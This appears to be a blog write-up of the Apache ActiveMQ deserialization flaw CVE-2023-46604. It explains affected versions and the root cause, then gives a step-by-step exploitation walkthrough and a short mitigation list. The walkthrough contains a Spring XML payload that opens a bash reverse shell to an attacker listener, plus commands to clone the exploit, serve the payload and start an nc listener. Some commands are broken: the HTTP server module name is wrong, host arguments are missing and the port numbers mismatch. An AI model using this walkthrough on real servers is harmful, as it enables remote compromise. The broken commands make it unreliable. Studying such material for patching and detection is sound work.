In the intricate landscape of cybersecurity, vulnerabilities often lurk in the shadows, waiting to be discovered and exploited. One such critical vulnerability that demands our attention is CVE-2023-46604, affecting the widely used Apache ActiveMQ messaging system.

At its core, CVE-2023-46604 exposes a remote code execution (RCE) vector within Apache ActiveMQ. The vulnerability arises from improper input validation, allowing malicious actors to craft specially crafted payloads that execute arbitrary code on affected servers. The consequences are severe: unauthorized access, data exfiltration, and potential system compromise. This CVE has been assigned a CVSS score of 10 by Apache.

What is Apache ActiveMQ?

Developed by Apache, ActiveMQ is an open source, multi-protocol, Java-based message broker. Its main function is to send messages between different applications. It serves as a reliable messaging backbone for applications, facilitating the exchange of data between distributed systems. ActiveMQ supports various messaging protocols, including MQTT, AMQP, and WebSocket, making it versatile for different communication needs. With features like message persistence, clustering, and high availability, it ensures message delivery even in the face of network failures or system crashes. ActiveMQ's flexible architecture allows it to integrate seamlessly with enterprise systems, providing scalable and robust messaging solutions. Its comprehensive management and monitoring tools enable administrators to efficiently manage message queues and monitor system performance in real-time. In essence, Apache ActiveMQ is a dependable and feature-rich messaging platform, empowering developers to build resilient and efficient distributed applications.

Affected version:

• Apache ActiveMQ 5.18.0 before 5.18.3
• Apache ActiveMQ 5.17.0 before 5.17.6
• Apache ActiveMQ 5.16.0 before 5.16.7
• Apache ActiveMQ before 5.15.16
• Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
• Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
• Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
• Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Technical Details of the CVE

The root cause of this vulnerability is insecure deserialization. Basically the input data passes through a process called unmarshalling, whose function is to transform binary data into a usable format. It can be said that deserialization is a form of unmarshalling. In java unmarshalling is the process of converting XML content to Java objects.

‍

DataStreamMarshallers are a class of unmarshalling components found in ActiveMQ. Based on the Data_Structure_Type that is attached to the data, the system chooses the component. The reason for ExceptionResponseMarshaller's vulnerability is that it doesn't verify the classes it builds using the ExceptionResponse data. By weaponizing a throwable class, an attacker may deceive the system into allowing it to run any code.

An XML file that is given as a parameter during class instantiation is used to setup Spring applications via ClassPathXmlApplicationContext. By using this vulnerability, an attacker can run code on the system by instantiating the ClassPathXmlApplicationContext class and passing it a weaponized XML file.

‍

Most of the publically available PoCs and exploits use this process to execute code on target or to obtain a reverse shell, including the metasploit module for the same.

Exploitation

Once you have identified that the version of target’s Apache ActiveMQ falls under the affected versions. We will be using this publicly available exploit:
https://github.com/rootsecdev/CVE-2023-46604

Follow the below steps for successful exploitation:

• Clone the repository and move into the directory.

git clone https://github.com/rootsecdev/CVE-2023-46604.git
cd CVE-2023-46604

‍

• Based on your OS modify the poc-linux.xml or poc-windows.xml accordingly and replace LISTENER IP and PORT to your nc listener’s ip and port:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="
 http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
            <value>bash</value>
            <value>-c</value>
            <!-- This command will give a reverse shell on port 9001. HTML Entity Encoded. Change IP as needed -->
            <value>bash -i &#x3E;&#x26; /dev/tcp/<LISTENER-IP>/<LISTENER-PORT> 0&#x3E;&#x26;1</value>
        </list>
        </constructor-arg>
    </bean>
</beans>

‍

• Now in a new terminal window go to the same directory as this xml file is in and start a HTTP server like this: python3 -m http.start
  The above command will start a HTTP server on port 8000.

• In another terminal window start a nc listener: nc -lnvp 9999

• Now run the exploit using the below mentioned command:

go run main.go -i  -p 61616 -u http:///poc-linux.xml

‍

• If everything goes well and the exploit runs successfully, the you should get a shell in your nc listener terminal window like this:

Mitigation

• Restrict network access to authorized clients only.

• Upgrade ActiveMQ to one of the patched versions, i.e. , 5.15.16, 5.16.7, 5.17.6, 5.18.3

• Use firewalls, intrusion detection systems and look out for indicators of compromise.

References

• ActiveMQ CVE-2023-46604 Exploited by Kinsing: Threat Analysis

• CVE-2023-46604

• Addressing ActiveMQ CVE 2023-46604: Risks and Mitigation Steps

• GitHub - rootsecdev/CVE-2023-46604: Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)

‍